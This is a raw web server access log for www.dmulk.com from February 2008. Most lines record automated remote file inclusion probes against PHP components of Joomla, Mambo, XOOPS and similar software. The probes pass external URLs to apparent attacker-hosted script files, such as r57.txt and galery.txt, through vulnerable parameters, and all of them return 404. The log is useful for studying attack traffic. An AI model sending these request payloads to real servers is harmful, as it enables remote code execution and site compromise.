81.2.252.56 - - [12/Feb/2008:15:14:20 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://r57.li/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.218.97.19 - - [12/Feb/2008:15:14:58 -0800] "GET /logs/access_080117.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.218.97.19 - - [12/Feb/2008:15:14:58 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.218.97.19 - - [12/Feb/2008:15:15:00 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.109.240.206 - - [12/Feb/2008:15:16:02 -0800] "GET /modifyform.html?code=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.225.219.10 - - [12/Feb/2008:15:18:16 -0800] "GET /logs/access_080108.log//templates/mangobery/footer.sample.php?Site_Path=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [12/Feb/2008:15:18:17 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [12/Feb/2008:15:18:17 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [12/Feb/2008:15:18:59 -0800] "GET /logs/access.log//templates/mangobery/footer.sample.php?Site_Path=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.203.199.52 - - [12/Feb/2008:15:21:41 -0800] "GET /logs/access_071225.log///////samplecalendar.php?path[docroot]=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.203.199.52 - - [12/Feb/2008:15:21:41 -0800] "GET ///////samplecalendar.php?path[docroot]=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.203.199.52 - - [12/Feb/2008:15:21:42 -0800] "GET /logs///////samplecalendar.php?path[docroot]=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.202.89.57 - - [12/Feb/2008:15:22:33 -0800] "GET /logs/access_080108.log/write.php?dir=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.202.89.57 - - [12/Feb/2008:15:22:39 -0800] "GET /write.php?dir=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.202.89.57 - - [12/Feb/2008:15:22:44 -0800] "GET /logs/write.php?dir=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.86.92.9 - - [12/Feb/2008:15:22:51 -0800] "GET /logs/access_080106.log//components/com_mosmedia/media.tab.php?mosConfig_absolute_path=http://www.fltowshow.com/administrator/components/com_juser/juser.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.92.9 - - [12/Feb/2008:15:22:51 -0800] "GET //components/com_mosmedia/media.tab.php?mosConfig_absolute_path=http://www.fltowshow.com/administrator/components/com_juser/juser.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.92.9 - - [12/Feb/2008:15:22:52 -0800] "GET /logs//components/com_mosmedia/media.tab.php?mosConfig_absolute_path=http://www.fltowshow.com/administrator/components/com_juser/juser.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.92.9 - - [12/Feb/2008:15:23:03 -0800] "GET /logs/access_080201.log//components/com_mosmedia/media.tab.php?mosConfig_absolute_path=http://www.fltowshow.com/administrator/components/com_juser/juser.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.241.169.59 - - [12/Feb/2008:15:23:56 -0800] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.241.169.59 - - [12/Feb/2008:15:23:56 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.241.169.59 - - [12/Feb/2008:15:23:56 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.127.72.15 - - [12/Feb/2008:15:28:37 -0800] "GET /postscript/postscript.php?p_mode=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.215.230.140 - - [12/Feb/2008:15:28:54 -0800] "GET /postscript/postscript.php?p_mode=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.29.12 - - [12/Feb/2008:15:29:30 -0800] "GET /logs/access_071014.log HTTP/1.0" 200 26799 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
194.0.252.2 - - [12/Feb/2008:15:29:32 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.0.252.2 - - [12/Feb/2008:15:30:16 -0800] "GET /logs/access_080122.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.0.252.2 - - [12/Feb/2008:15:30:16 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.0.252.2 - - [12/Feb/2008:15:30:16 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.0.252.2 - - [12/Feb/2008:15:31:24 -0800] "GET /logs/access_080122.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.0.252.2 - - [12/Feb/2008:15:31:24 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.0.252.2 - - [12/Feb/2008:15:31:24 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.215.226.24 - - [12/Feb/2008:15:31:40 -0800] "GET /logs/access_080108.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://avvv.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.215.226.24 - - [12/Feb/2008:15:31:40 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://avvv.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.215.226.24 - - [12/Feb/2008:15:31:41 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://avvv.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.202.89.57 - - [12/Feb/2008:15:32:01 -0800] "GET /logs/access_071225.log/write.php?dir=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.25.156 - - [12/Feb/2008:15:32:06 -0800] "GET /presto/?N=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.15.78.65 - - [12/Feb/2008:15:32:14 -0800] "GET /postscript/postscript.php?p_mode=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.248.81 - - [12/Feb/2008:15:38:13 -0800] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.248.81 - - [12/Feb/2008:15:38:15 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.248.81 - - [12/Feb/2008:15:38:16 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.109.240.206 - - [12/Feb/2008:15:45:12 -0800] "GET /logs/access_080131.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.109.240.206 - - [12/Feb/2008:15:45:13 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.109.240.206 - - [12/Feb/2008:15:45:14 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.7.232.34 - - [12/Feb/2008:15:47:04 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://dritoni.ch/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
208.7.232.34 - - [12/Feb/2008:15:47:04 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://dritoni.ch/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
61.36.30.145 - - [12/Feb/2008:15:48:40 -0800] "GET /logs/access_080118.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.burhanukum.com/images/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.109.240.206 - - [12/Feb/2008:15:50:56 -0800] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.109.240.206 - - [12/Feb/2008:15:50:58 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.109.240.206 - - [12/Feb/2008:15:50:59 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.60.207.191 - - [12/Feb/2008:15:56:01 -0800] "GET /logs/access_080122.log//modules/Neos_Chronos/header.php?base_folder=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.60.207.191 - - [12/Feb/2008:15:56:02 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.60.207.191 - - [12/Feb/2008:15:56:02 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.60.207.191 - - [12/Feb/2008:15:57:11 -0800] "GET /logs/access_080103.log//modules/Neos_Chronos/header.php?base_folder=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.203.38.130 - - [12/Feb/2008:15:57:31 -0800] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.burhanukum.com/images/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
122.203.38.130 - - [12/Feb/2008:15:57:31 -0800] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.burhanukum.com/images/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
122.203.38.130 - - [12/Feb/2008:15:57:32 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.burhanukum.com/images/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.134.134.229 - - [12/Feb/2008:15:58:00 -0800] "GET /logs/access_080122.log//newspublish/include.php?path%5Bdocroot%5D=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.134.134.229 - - [12/Feb/2008:15:58:01 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.134.134.229 - - [12/Feb/2008:15:58:01 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.67.82 - - [12/Feb/2008:15:59:55 -0800] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.67.82 - - [12/Feb/2008:15:59:56 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.67.82 - - [12/Feb/2008:15:59:59 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.248.81 - - [12/Feb/2008:16:02:13 -0800] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.248.81 - - [12/Feb/2008:16:02:13 -0800] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.248.81 - - [12/Feb/2008:16:02:13 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.109.240.206 - - [12/Feb/2008:16:02:39 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.109.240.206 - - [12/Feb/2008:16:07:32 -0800] "GET /logs/access_080111.log//modules/TotalCalendar/about.php?inc_dir=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.109.240.206 - - [12/Feb/2008:16:07:32 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.109.240.206 - - [12/Feb/2008:16:07:33 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.7.232.34 - - [12/Feb/2008:16:07:48 -0800] "GET /@helphttp://dritoni.ch/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
208.7.232.34 - - [12/Feb/2008:16:07:48 -0800] "GET /logs/@helphttp://dritoni.ch/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
200.109.240.206 - - [12/Feb/2008:16:11:23 -0800] "GET /logs/access_080130.log//modules/TotalCalendar/about.php?inc_dir=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.89.60 - - [12/Feb/2008:16:12:20 -0800] "GET /logs/access_080120.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.89.60 - - [12/Feb/2008:16:12:28 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.89.60 - - [12/Feb/2008:16:12:37 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.212.164.34 - - [12/Feb/2008:16:12:44 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.pilcom.net/data/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.163.232 - - [12/Feb/2008:16:14:43 -0800] "GET /logs/access.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [12/Feb/2008:16:14:43 -0800] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [12/Feb/2008:16:14:43 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.212.164.34 - - [12/Feb/2008:16:14:56 -0800] "GET /logs/access_080131.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.pilcom.net/data/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.34 - - [12/Feb/2008:16:14:56 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.pilcom.net/data/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.34 - - [12/Feb/2008:16:14:57 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.pilcom.net/data/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.34 - - [12/Feb/2008:16:15:06 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.pilcom.net/data/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.163.232 - - [12/Feb/2008:16:16:01 -0800] "GET /logs/access_080117.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.30.216.103 - - [12/Feb/2008:16:17:19 -0800] "GET /logs/access_071225.log HTTP/1.0" 200 195051 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.13.222.135 - - [12/Feb/2008:16:29:26 -0800] "GET /logs/access_080131.log/scanhttp://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.222.135 - - [12/Feb/2008:16:29:26 -0800] "GET /scanhttp://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.222.135 - - [12/Feb/2008:16:29:26 -0800] "GET /logs/scanhttp://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.241.167.251 - - [12/Feb/2008:16:29:56 -0800] "GET /logs/access_071231.log/omponents/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
80.241.167.251 - - [12/Feb/2008:16:29:57 -0800] "GET /omponents/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
80.241.167.251 - - [12/Feb/2008:16:29:57 -0800] "GET /logs/omponents/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
83.172.138.13 - - [12/Feb/2008:16:29:58 -0800] "GET /logs/access_080131.log/scanhttp://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.172.138.13 - - [12/Feb/2008:16:29:58 -0800] "GET /scanhttp://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.172.138.13 - - [12/Feb/2008:16:29:58 -0800] "GET /logs/scanhttp://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.241.167.251 - - [12/Feb/2008:16:30:00 -0800] "GET /logs/access_080118.log/omponents/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
211.115.89.60 - - [12/Feb/2008:16:30:05 -0800] "GET /logs/access_080118.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.18.66 - - [12/Feb/2008:16:33:21 -0800] "GET /logs/access_080120.log/config.php?path_to_root=http://www.awonderfulauction.com/uploaded/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [12/Feb/2008:16:33:21 -0800] "GET /config.php?path_to_root=http://www.awonderfulauction.com/uploaded/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [12/Feb/2008:16:33:21 -0800] "GET /logs/config.php?path_to_root=http://www.awonderfulauction.com/uploaded/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [12/Feb/2008:16:33:44 -0800] "GET /logs/access_080108.log/config.php?path_to_root=http://www.awonderfulauction.com/uploaded/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.217.247.166 - - [12/Feb/2008:16:34:31 -0800] "GET /logs/access_080131.log/scanhttp://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [12/Feb/2008:16:34:32 -0800] "GET /scanhttp://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [12/Feb/2008:16:34:38 -0800] "GET /logs/scanhttp://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.40.23.83 - - [12/Feb/2008:16:37:15 -0800] "GET /logs/access_080120.log/config.php?path_to_root=http://www.awonderfulauction.com/uploaded/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.40.23.83 - - [12/Feb/2008:16:37:15 -0800] "GET /config.php?path_to_root=http://www.awonderfulauction.com/uploaded/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.40.23.83 - - [12/Feb/2008:16:37:15 -0800] "GET /logs/config.php?path_to_root=http://www.awonderfulauction.com/uploaded/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.67.82 - - [12/Feb/2008:16:38:07 -0800] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.67.82 - - [12/Feb/2008:16:38:12 -0800] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.67.82 - - [12/Feb/2008:16:38:13 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [12/Feb/2008:16:39:13 -0800] "GET /logs/access_071219.log/admin/spaw/spaw_control.class.php?spaw_root=http://www.awonderfulauction.com/uploaded/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [12/Feb/2008:16:39:13 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.awonderfulauction.com/uploaded/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [12/Feb/2008:16:39:13 -0800] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://www.awonderfulauction.com/uploaded/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [12/Feb/2008:16:39:43 -0800] "GET /logs/access_071212.log/admin/spaw/spaw_control.class.php?spaw_root=http://www.awonderfulauction.com/uploaded/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.40.23.83 - - [12/Feb/2008:16:40:14 -0800] "GET /logs/access_080108.log/config.php?path_to_root=http://www.awonderfulauction.com/uploaded/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.44.108 - - [12/Feb/2008:16:44:45 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com" 67.195